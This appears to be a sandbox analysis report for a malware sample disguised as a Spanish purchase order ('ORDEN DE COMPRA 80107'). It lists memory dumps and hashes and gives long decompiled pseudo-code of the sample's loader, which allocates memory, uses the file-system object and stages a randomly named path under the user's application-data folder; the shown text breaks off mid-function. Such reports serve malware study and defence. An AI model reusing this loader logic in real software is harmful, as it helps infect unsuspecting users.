Source File: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: #100
String ID: VB5!6&*
API String ID: 1341478452-3593831657
Opcode ID: ce621127cf711e4bba208c6a1a638b3f71d6890ff40995b3ad26ed8ecf8c12ed
Instruction ID: 72823d2a912fdafaf7cf9b3e2a67d71fee1891d63b888cf7ed3055c4da821cb5
Opcode Fuzzy Hash: ce621127cf711e4bba208c6a1a638b3f71d6890ff40995b3ad26ed8ecf8c12ed
Instruction Fuzzy Hash: 3D51236606E3C20FC3434B7058249823FB19F5722638E2DEBC485EF1F3D669880AD366

Uniqueness

Uniqueness Score: -1.00%

Function 00413579 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 173
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00014000,00014000,-2CCCF76F), ref: 0041366C

Strings

1@L`, xrefs: 0041362E

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: 1@L`
API String ID: 4275171209-137866313
Opcode ID: 53324ead2a9a83615a9875bb108a3b2d28d884e5c29d420561e43be9d5314ec3
Instruction ID: 7e6c24509bbc3359a3882b2743cb4f9375a75c50d726e221f270316dc24c07d5
Opcode Fuzzy Hash: 53324ead2a9a83615a9875bb108a3b2d28d884e5c29d420561e43be9d5314ec3
Instruction Fuzzy Hash: D1316B759A7604BAD2345D38985696AF3E8EF03F41F02792FDD4AE7350CE2889C2C60D

Uniqueness

Uniqueness Score: -1.00%

Function 0041357E Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 172
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00014000,00014000,-2CCCF76F), ref: 0041366C

Strings

1@L`, xrefs: 0041362E

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: 1@L`
API String ID: 4275171209-137866313
Opcode ID: 3ec44ade8d9b5079a5b1f6261518f223bfa05958b068b134b2791402b1888b2b
Instruction ID: 1ef038a7d243f56d0d5cc5a980dcea59bce35fe5c8561608a3cf8286f386c19c
Opcode Fuzzy Hash: 3ec44ade8d9b5079a5b1f6261518f223bfa05958b068b134b2791402b1888b2b
Instruction Fuzzy Hash: 403169619A7504BAD2385D38985296AF3E8EF03F41F02792BDD4AE7310CE2889C2860D

Uniqueness

Uniqueness Score: -1.00%

Function 00424314 Relevance: 415.0, APIs: 220, Strings: 16, Instructions: 1996
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00424314(void* __ebx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				short _v32;
				void* _v36;
				char _v40;
				short _v44;
				short _v48;
				void* _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				signed long long _v88;
				char _v96;
				intOrPtr _v100;
				char* _v104;
				char _v112;
				char* _v120;
				char _v128;
				char* _v136;
				intOrPtr _v144;
				char* _v152;
				char _v160;
				signed int _v168;
				char _v176;
				char* _v184;
				intOrPtr _v192;
				char _v196;
				char _v200;
				signed char _v204;
				signed char _v208;
				signed long long _v212;
				signed long long _v216;
				char _v220;
				char _v224;
				signed int _v228;
				signed char _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed long long _v268;
				signed int _v272;
				signed int _v276;
				signed long long _v280;
				signed long long _v284;
				signed int _v288;
				signed int _v292;
				intOrPtr* _v296;
				signed int _v300;
				intOrPtr* _v304;
				char _v308;
				intOrPtr _v312;
				signed int _v316;
				intOrPtr* _v320;
				signed int _v324;
				intOrPtr* _v328;
				signed int _v332;
				signed int _v336;
				intOrPtr* _v340;
				signed int _v344;
				signed int _v348;
				intOrPtr* _v352;
				signed int _v356;
				intOrPtr* _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				intOrPtr* _v376;
				signed int _v380;
				signed int _v384;
				intOrPtr* _v388;
				signed int _v392;
				signed int _v396;
				intOrPtr* _v400;
				signed int _v404;
				signed int _v408;
				intOrPtr* _v412;
				signed int _v416;
				intOrPtr* _v420;
				signed int _v424;
				signed int _v428;
				intOrPtr* _v432;
				signed int _v436;
				intOrPtr* _v440;
				signed int _v444;
				intOrPtr* _v448;
				signed int _v452;
				signed int _v456;
				intOrPtr* _v460;
				signed int _v464;
				intOrPtr* _v468;
				signed int _v472;
				signed int _v476;
				intOrPtr* _v480;
				signed int _v484;
				signed int _v488;
				intOrPtr* _v492;
				signed char _v496;
				intOrPtr* _v500;
				signed int _v504;
				intOrPtr* _v508;
				signed int _v512;
				intOrPtr* _v516;
				signed int _v520;
				intOrPtr* _v524;
				signed int _v528;
				intOrPtr* _v532;
				signed int _v536;
				signed int _v540;
				intOrPtr* _v544;
				signed int _v548;
				signed int _v552;
				char* _t966;
				char* _t969;
				char* _t972;
				signed int _t973;
				short _t975;
				signed int _t979;
				signed int _t986;
				signed int _t990;
				signed int _t994;
				short _t995;
				signed int _t999;
				signed int _t1003;
				signed int _t1005;
				signed int _t1009;
				signed int _t1013;
				char* _t1018;
				signed int _t1022;
				signed int _t1034;
				signed int _t1038;
				signed int _t1042;
				signed int _t1046;
				signed int _t1048;
				char* _t1050;
				signed int _t1054;
				signed int _t1063;
				signed int _t1067;
				signed int _t1080;
				signed int _t1085;
				signed int _t1089;
				signed long long* _t1091;
				signed int _t1094;
				signed int _t1099;
				signed int _t1103;
				signed int _t1105;
				signed char _t1106;
				signed int _t1110;
				signed int _t1114;
				signed int _t1118;
				signed int _t1122;
				char* _t1125;
				signed int _t1128;
				short _t1137;
				signed int _t1141;
				signed int _t1145;
				char* _t1148;
				signed int _t1158;
				signed int _t1162;
				signed int _t1170;
				signed int _t1174;
				signed int _t1181;
				signed int _t1197;
				signed int _t1201;
				signed int _t1205;
				signed int _t1209;
				signed int _t1211;
				char* _t1212;
				signed int _t1224;
				signed int _t1228;
				signed long long _t1232;
				signed int _t1241;
				signed int _t1248;
				signed char _t1252;
				char* _t1254;
				char* _t1257;
				signed int _t1270;
				signed int _t1274;
				signed int _t1278;
				signed int _t1282;
				signed int _t1286;
				signed int _t1290;
				char* _t1292;
				char* _t1296;
				signed int _t1311;
				signed int _t1315;
				signed int _t1319;
				signed int _t1323;
				signed long long _t1324;
				signed int _t1332;
				signed int _t1343;
				signed int _t1347;
				signed int _t1363;
				char* _t1368;
				intOrPtr _t1383;
				void* _t1528;
				void* _t1530;
				intOrPtr _t1531;
				intOrPtr* _t1532;
				intOrPtr _t1561;
				signed long long _t1567;

				_t1531 = _t1530 - 0xc;
				 *[fs:0x0] = _t1531;
				L00401330();
				_v16 = _t1531;
				_v12 = 0x4011c8;
				_v8 = _a4 & 0x00000001;
				_a4 = _a4 & 0xfffffffe;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x401336, _t1528);
				_push( &_v96);
				L00401594();
				_t966 =  &_v96;
				_push(_t966);
				L0040159A();
				_v228 =  ~(0 | _t966 - 0x0000ffff >= 0x00000000);
				L0040158E();
				if(_v228 != 0) {
					_v88 =  *0x4011c4;
					_v96 = 4;
					_push(0);
					__eax =  &_v96;
					_push( &_v96);
					__eax =  &_v112;
					_push( &_v112);
					L0040157C();
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xfffffffe);
					_push(0xffffffff);
					__eax =  &_v112;
					_push( &_v112); // executed
					L00401582(); // executed
					L00401588();
					__eax =  &_v112;
					_push( &_v112);
					__eax =  &_v96;
					_push( &_v96);
					_push(2);
					L00401576();
					__esp = __esp + 0xc;
					if( *0x42a010 != 0) {
						_v296 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v296 = 0x42a010;
					}
					_v296 =  *_v296;
					__eax =  *((intOrPtr*)( *((intOrPtr*)( *_v296)) + 0x310))( *_v296);
					__eax =  &_v68;
					L00401564();
					_v228 = __eax;
					__eax =  &_v56;
					_v228 =  *_v228;
					__eax =  *((intOrPtr*)( *_v228 + 0xa0))(_v228,  &_v56, __eax,  *_v296);
					asm("fclex");
					_v232 = __eax;
					if(_v232 >= 0) {
						_v300 = _v300 & 0x00000000;
					} else {
						_push(0xa0);
						_push(0x40f9cc);
						_push(_v228);
						_push(_v232);
						L00401558();
						_v300 = __eax;
					}
					__eax = _v56;
					_v268 = _v56;
					_v56 = _v56 & 0x00000000;
					__eax = _v268;
					_v88 = _v268;
					_v96 = 8;
					__eax =  &_v96;
					_push( &_v96);
					__eax =  &_v112;
					_push( &_v112);
					L0040156A();
					__eax =  &_v112;
					_push( &_v112);
					L00401570();
					L00401588();
					L00401552();
					__eax =  &_v112;
					_push( &_v112);
					__eax =  &_v96;
					_push( &_v96);
					_push(2);
					L00401576();
					__esp = __esp + 0xc;
				}
				_push(0);
				_push(L"Scripting.FileSystemObject");
				_push( &_v96); // executed
				L00401540(); // executed
				_t969 =  &_v96;
				_push(_t969);
				L00401546();
				_push(_t969);
				_push( &_v40);
				L0040154C();
				L0040158E();
				_v136 = L"HIPPOMETER";
				_v144 = 8;
				_v168 = _v168 & 0x00000000;
				_v176 = 0x8002;
				_push(0x10);
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"FolderExists");
				_push(_v40);
				_t972 =  &_v96;
				_push(_t972); // executed
				L00401534(); // executed
				_t1532 = _t1531 + 0x20;
				_push(_t972);
				_t973 =  &_v176;
				_push(_t973);
				L0040153A();
				_v228 = _t973;
				L0040158E();
				if(_v228 != 0) {
					_v136 = L"appdata";
					_v144 = 8;
					L0040151C();
					_push( &_v96);
					_push( &_v112);
					L00401522();
					_v152 = L"\\yf6svhF8LWErfw4ZrCRuxOdYLn2c7qO224";
					_v160 = 8;
					_push( &_v112);
					_push( &_v160);
					_t1368 =  &_v128;
					_push(_t1368);
					L00401528();
					_push(_t1368);
					L00401570();
					L00401588();
					_push(_t1368);
					_push(1);
					_push(0xffffffff);
					_push(0x120);
					L0040152E();
					L00401516();
					_push( &_v128);
					_push( &_v112);
					_push( &_v96);
					_push(3);
					L00401576();
					_t1532 = _t1532 + 0x10;
					_push(1);
					_push(_a4 + 0x34);
					_push(0);
					L00401510();
					_push(1);
					L0040150A();
					_push(L"triforniaobesities");
					_push("AUL");
					L004014FE();
					L00401588();
					L00401504();
					L00401516();
				}
				_v88 = 0x80020004;
				_v96 = 0xa;
				_t975 =  &_v96;
				_push(_t975);
				L004014F8();
				_v196 = _t975;
				if( *0x42a010 != 0) {
					_v304 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v304 = 0x42a010;
				}
				_t1383 =  *((intOrPtr*)( *_v304));
				_t979 =  &_v68;
				L00401564();
				_v228 = _t979;
				_v184 = 0x80020004;
				_v192 = 0xa;
				_v168 = 0x80020004;
				_v176 = 0xa;
				_v152 = 0x80020004;
				_v160 = 0xa;
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v196;
				asm("fild dword [ebp-0x130]");
				_v312 = _t1561;
				 *_t1532 = _v312;
				_t986 =  *((intOrPtr*)( *_v228 + 0x1d0))(_v228, _t1383, 0x10, 0x10, 0x10, _t979,  *((intOrPtr*)(_t1383 + 0x350))( *_v304));
				asm("fclex");
				_v232 = _t986;
				if(_v232 >= 0) {
					_v316 = _v316 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x40fabc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v316 = _t986;
				}
				L00401552();
				L0040158E();
				if( *0x42a010 != 0) {
					_v320 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v320 = 0x42a010;
				}
				_t990 =  &_v68;
				L00401564();
				_v228 = _t990;
				_t994 =  *((intOrPtr*)( *_v228 + 0x1e0))(_v228,  &_v56, _t990,  *((intOrPtr*)( *((intOrPtr*)( *_v320)) + 0x330))( *_v320));
				asm("fclex");
				_v232 = _t994;
				if(_v232 >= 0) {
					_v324 = _v324 & 0x00000000;
				} else {
					_push(0x1e0);
					_push(0x40f9cc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v324 = _t994;
				}
				_v88 = 0x80020004;
				_v96 = 0xa;
				_t995 =  &_v96;
				_push(_t995);
				L004014F8();
				_v200 = _t995;
				if( *0x42a010 != 0) {
					_v328 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v328 = 0x42a010;
				}
				_t999 =  &_v72;
				L00401564();
				_v236 = _t999;
				_t1003 =  *((intOrPtr*)( *_v236 + 0x78))(_v236,  &_v212, _t999,  *((intOrPtr*)( *((intOrPtr*)( *_v328)) + 0x314))( *_v328));
				asm("fclex");
				_v240 = _t1003;
				if(_v240 >= 0) {
					_v332 = _v332 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x40facc);
					_push(_v236);
					_push(_v240);
					L00401558();
					_v332 = _t1003;
				}
				_v104 = _v212;
				_v112 = 4;
				_push( &_v128);
				_t1005 =  &_v112;
				_push(_t1005);
				L004014F2();
				_v244 = _t1005;
				if(_v244 >= 0) {
					_v336 = _v336 & 0x00000000;
				} else {
					_push(_v244);
					L004014EC();
					_v336 = _t1005;
				}
				if( *0x42a010 != 0) {
					_v340 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v340 = 0x42a010;
				}
				_t1009 =  &_v76;
				L00401564();
				_v248 = _t1009;
				_t1013 =  *((intOrPtr*)( *_v248 + 0x1b0))(_v248,  &_v60, _t1009,  *((intOrPtr*)( *((intOrPtr*)( *_v340)) + 0x340))( *_v340));
				asm("fclex");
				_v252 = _t1013;
				if(_v252 >= 0) {
					_v344 = _v344 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x40fadc);
					_push(_v248);
					_push(_v252);
					L00401558();
					_v344 = _t1013;
				}
				_v216 = 0x4e3788;
				_v272 = _v60;
				_v60 = _v60 & 0x00000000;
				L00401588();
				_v196 = _v200;
				_t1018 =  &_v128;
				L004014E6();
				_t1022 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4, _v56, 0x35dc,  &_v196, _t1018, _t1018,  &_v64, 0x3607,  &_v216);
				_v256 = _t1022;
				if(_v256 >= 0) {
					_v348 = _v348 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x40f6c0);
					_push(_a4);
					_push(_v256);
					L00401558();
					_v348 = _t1022;
				}
				_push( &_v64);
				_push( &_v56);
				_push(2);
				L004014E0();
				_push( &_v76);
				_push( &_v72);
				_push( &_v68);
				_push(3);
				L004014DA();
				_push( &_v128);
				_push( &_v112);
				_push( &_v96);
				_push(3);
				L00401576();
				if( *0x42a010 != 0) {
					_v352 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v352 = 0x42a010;
				}
				_t1034 =  &_v68;
				L00401564();
				_v228 = _t1034;
				_t1038 =  *((intOrPtr*)( *_v228 + 0x170))(_v228,  &_v56, _t1034,  *((intOrPtr*)( *((intOrPtr*)( *_v352)) + 0x314))( *_v352));
				asm("fclex");
				_v232 = _t1038;
				if(_v232 >= 0) {
					_v356 = _v356 & 0x00000000;
				} else {
					_push(0x170);
					_push(0x40facc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v356 = _t1038;
				}
				if( *0x42a010 != 0) {
					_v360 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v360 = 0x42a010;
				}
				_t1042 =  &_v72;
				L00401564();
				_v236 = _t1042;
				_t1046 =  *((intOrPtr*)( *_v236 + 0x180))(_v236,  &_v196, _t1042,  *((intOrPtr*)( *((intOrPtr*)( *_v360)) + 0x324))( *_v360));
				asm("fclex");
				_v240 = _t1046;
				if(_v240 >= 0) {
					_v364 = _v364 & 0x00000000;
				} else {
					_push(0x180);
					_push(0x40faec);
					_push(_v236);
					_push(_v240);
					L00401558();
					_v364 = _t1046;
				}
				_v88 =  *0x4011c0;
				_v96 = 4;
				_push( &_v112);
				_t1048 =  &_v96;
				_push(_t1048);
				L004014F2();
				_v244 = _t1048;
				if(_v244 >= 0) {
					_v368 = _v368 & 0x00000000;
				} else {
					_push(_v244);
					L004014EC();
					_v368 = _t1048;
				}
				_v212 = 0x3683d;
				_t1050 =  &_v112;
				L004014E6();
				_t1054 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v212, _v56, _v196, _t1050, _t1050,  &_v200);
				_v248 = _t1054;
				if(_v248 >= 0) {
					_v372 = _v372 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40f6c0);
					_push(_a4);
					_push(_v248);
					L00401558();
					_v372 = _t1054;
				}
				_v48 = _v200;
				L00401516();
				_push( &_v72);
				_push( &_v68);
				_push(2);
				L004014DA();
				_push( &_v112);
				_push( &_v96);
				_push(2);
				L00401576();
				if( *0x42a010 != 0) {
					_v376 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v376 = 0x42a010;
				}
				_t1063 =  &_v68;
				L00401564();
				_v228 = _t1063;
				_t1067 =  *((intOrPtr*)( *_v228 + 0x68))(_v228,  &_v212, _t1063,  *((intOrPtr*)( *((intOrPtr*)( *_v376)) + 0x304))( *_v376));
				asm("fclex");
				_v232 = _t1067;
				if(_v232 >= 0) {
					_v380 = _v380 & 0x00000000;
				} else {
					_push(0x68);
					_push(0x40fafc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v380 = _t1067;
				}
				_v196 = 0x371d;
				 *((intOrPtr*)( *_a4 + 0x720))(_a4,  &_v196, _v212,  &_v216);
				 *(_a4 + 0x3c) = _v216;
				L00401552();
				 *((intOrPtr*)( *_a4 + 0x724))(_a4);
				_t1080 =  *((intOrPtr*)( *_a4 + 0x700))(_a4,  &_v196);
				_v228 = _t1080;
				if(_v228 >= 0) {
					_v384 = _v384 & 0x00000000;
				} else {
					_push(0x700);
					_push(0x40f6c0);
					_push(_a4);
					_push(_v228);
					L00401558();
					_v384 = _t1080;
				}
				_v32 = _v196;
				if( *0x42a010 != 0) {
					_v388 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v388 = 0x42a010;
				}
				_t1085 =  &_v68;
				L00401564();
				_v228 = _t1085;
				_t1089 =  *((intOrPtr*)( *_v228 + 0x50))(_v228,  &_v56, _t1085,  *((intOrPtr*)( *((intOrPtr*)( *_v388)) + 0x348))( *_v388));
				asm("fclex");
				_v232 = _t1089;
				if(_v232 >= 0) {
					_v392 = _v392 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40faec);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v392 = _t1089;
				}
				_v212 = 0x575fb7;
				_t1091 =  &_v212;
				L004014D4();
				_t1094 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, _t1091, _v56, _t1091, L"TOMMELTOTTENS",  &_v60);
				_v236 = _t1094;
				if(_v236 >= 0) {
					_v396 = _v396 & 0x00000000;
				} else {
					_push(0x704);
					_push(0x40f6c0);
					_push(_a4);
					_push(_v236);
					L00401558();
					_v396 = _t1094;
				}
				_v276 = _v60;
				_v60 = _v60 & 0x00000000;
				L00401588();
				L00401516();
				L00401552();
				if( *0x42a010 != 0) {
					_v400 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v400 = 0x42a010;
				}
				_t1099 =  &_v68;
				L00401564();
				_v228 = _t1099;
				_t1103 =  *((intOrPtr*)( *_v228 + 0x70))(_v228,  &_v212, _t1099,  *((intOrPtr*)( *((intOrPtr*)( *_v400)) + 0x304))( *_v400));
				asm("fclex");
				_v232 = _t1103;
				if(_v232 >= 0) {
					_v404 = _v404 & 0x00000000;
				} else {
					_push(0x70);
					_push(0x40fafc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v404 = _t1103;
				}
				_v88 = _v212;
				_v96 = 4;
				_push( &_v112);
				_t1105 =  &_v96;
				_push(_t1105);
				L004014F2();
				_v236 = _t1105;
				if(_v236 >= 0) {
					_v408 = _v408 & 0x00000000;
				} else {
					_push(_v236);
					L004014EC();
					_v408 = _t1105;
				}
				_v120 = 0x80020004;
				_v128 = 0xa;
				_t1106 =  &_v128;
				_push(_t1106);
				L004014F8();
				_v208 = _t1106;
				if( *0x42a010 != 0) {
					_v412 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v412 = 0x42a010;
				}
				_t1110 =  &_v72;
				L00401564();
				_v240 = _t1110;
				_t1114 =  *((intOrPtr*)( *_v240 + 0x1e8))(_v240,  &_v196, _t1110,  *((intOrPtr*)( *((intOrPtr*)( *_v412)) + 0x310))( *_v412));
				asm("fclex");
				_v244 = _t1114;
				if(_v244 >= 0) {
					_v416 = _v416 & 0x00000000;
				} else {
					_push(0x1e8);
					_push(0x40f9cc);
					_push(_v240);
					_push(_v244);
					L00401558();
					_v416 = _t1114;
				}
				if( *0x42a010 != 0) {
					_v420 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v420 = 0x42a010;
				}
				_t1118 =  &_v76;
				L00401564();
				_v248 = _t1118;
				_t1122 =  *((intOrPtr*)( *_v248 + 0x148))(_v248,  &_v200, _t1118,  *((intOrPtr*)( *((intOrPtr*)( *_v420)) + 0x364))( *_v420));
				asm("fclex");
				_v252 = _t1122;
				if(_v252 >= 0) {
					_v424 = _v424 & 0x00000000;
				} else {
					_push(0x148);
					_push(0x40fb2c);
					_push(_v248);
					_push(_v252);
					L00401558();
					_v424 = _t1122;
				}
				_v204 = _v208;
				_t1125 =  &_v112;
				L004014E6();
				_t1128 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, _t1125, _t1125,  &_v204, 0x5a29, _v196, _v200);
				_v256 = _t1128;
				if(_v256 >= 0) {
					_v428 = _v428 & 0x00000000;
				} else {
					_push(0x708);
					_push(0x40f6c0);
					_push(_a4);
					_push(_v256);
					L00401558();
					_v428 = _t1128;
				}
				L004014DA();
				L00401576();
				_t1137 =  *((intOrPtr*)( *_a4 + 0x728))(_a4, 3,  &_v96,  &_v128,  &_v112, 3,  &_v68,  &_v72,  &_v76);
				_push(L"flothedernestipuloi");
				L004014CE();
				_v200 = _t1137;
				if( *0x42a010 != 0) {
					_v432 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v432 = 0x42a010;
				}
				_t1141 =  &_v68;
				L00401564();
				_v228 = _t1141;
				_t1145 =  *((intOrPtr*)( *_v228 + 0x130))(_v228,  &_v72, _t1141,  *((intOrPtr*)( *((intOrPtr*)( *_v432)) + 0x314))( *_v432));
				asm("fclex");
				_v232 = _t1145;
				if(_v232 >= 0) {
					_v436 = _v436 & 0x00000000;
				} else {
					_push(0x130);
					_push(0x40facc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v436 = _t1145;
				}
				L004014C8(); // executed
				_t1148 =  &_v96;
				L00401570();
				L00401588();
				 *((intOrPtr*)( *_a4 + 0x72c))(_a4, _v200, _t1148, _t1148, 0x39201a,  &_v196,  &_v96, _v72, 0, 0);
				 *((short*)(_a4 + 0x40)) = _v196;
				L00401516();
				_push( &_v72);
				_push( &_v68);
				_push(2);
				L004014DA();
				L0040158E();
				if( *0x42a010 != 0) {
					_v440 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v440 = 0x42a010;
				}
				_t1158 =  &_v68;
				L00401564();
				_v228 = _t1158;
				_t1162 =  *((intOrPtr*)( *_v228 + 0x50))(_v228,  &_v56, _t1158,  *((intOrPtr*)( *((intOrPtr*)( *_v440)) + 0x320))( *_v440));
				asm("fclex");
				_v232 = _t1162;
				if(_v232 >= 0) {
					_v444 = _v444 & 0x00000000;
				} else {
					_push(0x50);
					_push(0x40fabc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v444 = _t1162;
				}
				_v280 = _v56;
				_v56 = _v56 & 0x00000000;
				_v88 = _v280;
				_v96 = 8;
				_push( &_v96);
				_push( &_v112);
				L004014C2();
				if( *0x42a010 != 0) {
					_v448 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v448 = 0x42a010;
				}
				_t1170 =  &_v72;
				L00401564();
				_v236 = _t1170;
				_t1174 =  *((intOrPtr*)( *_v236 + 0x198))(_v236,  &_v60, _t1170,  *((intOrPtr*)( *((intOrPtr*)( *_v448)) + 0x338))( *_v448));
				asm("fclex");
				_v240 = _t1174;
				if(_v240 >= 0) {
					_v452 = _v452 & 0x00000000;
				} else {
					_push(0x198);
					_push(0x40fabc);
					_push(_v236);
					_push(_v240);
					L00401558();
					_v452 = _t1174;
				}
				_v196 = 0x148a;
				L00401570();
				L00401588();
				_t1181 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v64,  &_v196, _v60,  &_v200,  &_v112);
				_v244 = _t1181;
				if(_v244 >= 0) {
					_v456 = _v456 & 0x00000000;
				} else {
					_push(0x70c);
					_push(0x40f6c0);
					_push(_a4);
					_push(_v244);
					L00401558();
					_v456 = _t1181;
				}
				_v44 = _v200;
				L004014E0();
				L004014DA();
				L00401576();
				 *((intOrPtr*)( *_a4 + 0x730))(_a4,  &_v196, 2,  &_v96,  &_v112, 2,  &_v68,  &_v72, 2,  &_v64,  &_v60);
				 *((short*)(_a4 + 0x42)) = _v196;
				if( *0x42a010 != 0) {
					_v460 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v460 = 0x42a010;
				}
				_t1197 =  &_v68;
				L00401564();
				_v228 = _t1197;
				_t1201 =  *((intOrPtr*)( *_v228 + 0x60))(_v228,  &_v212, _t1197,  *((intOrPtr*)( *((intOrPtr*)( *_v460)) + 0x35c))( *_v460));
				asm("fclex");
				_v232 = _t1201;
				if(_v232 >= 0) {
					_v464 = _v464 & 0x00000000;
				} else {
					_push(0x60);
					_push(0x40fabc);
					_push(_v228);
					_push(_v232);
					L00401558();
					_v464 = _t1201;
				}
				if( *0x42a010 != 0) {
					_v468 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v468 = 0x42a010;
				}
				_t1205 =  &_v72;
				L00401564();
				_v236 = _t1205;
				_t1209 =  *((intOrPtr*)( *_v236 + 0x78))(_v236,  &_v216, _t1205,  *((intOrPtr*)( *((intOrPtr*)( *_v468)) + 0x360))( *_v468));
				asm("fclex");
				_v240 = _t1209;
				if(_v240 >= 0) {
					_v472 = _v472 & 0x00000000;
				} else {
					_push(0x78);
					_push(0x40faec);
					_push(_v236);
					_push(_v240);
					L00401558();
					_v472 = _t1209;
				}
				_v88 = _v216;
				_v96 = 4;
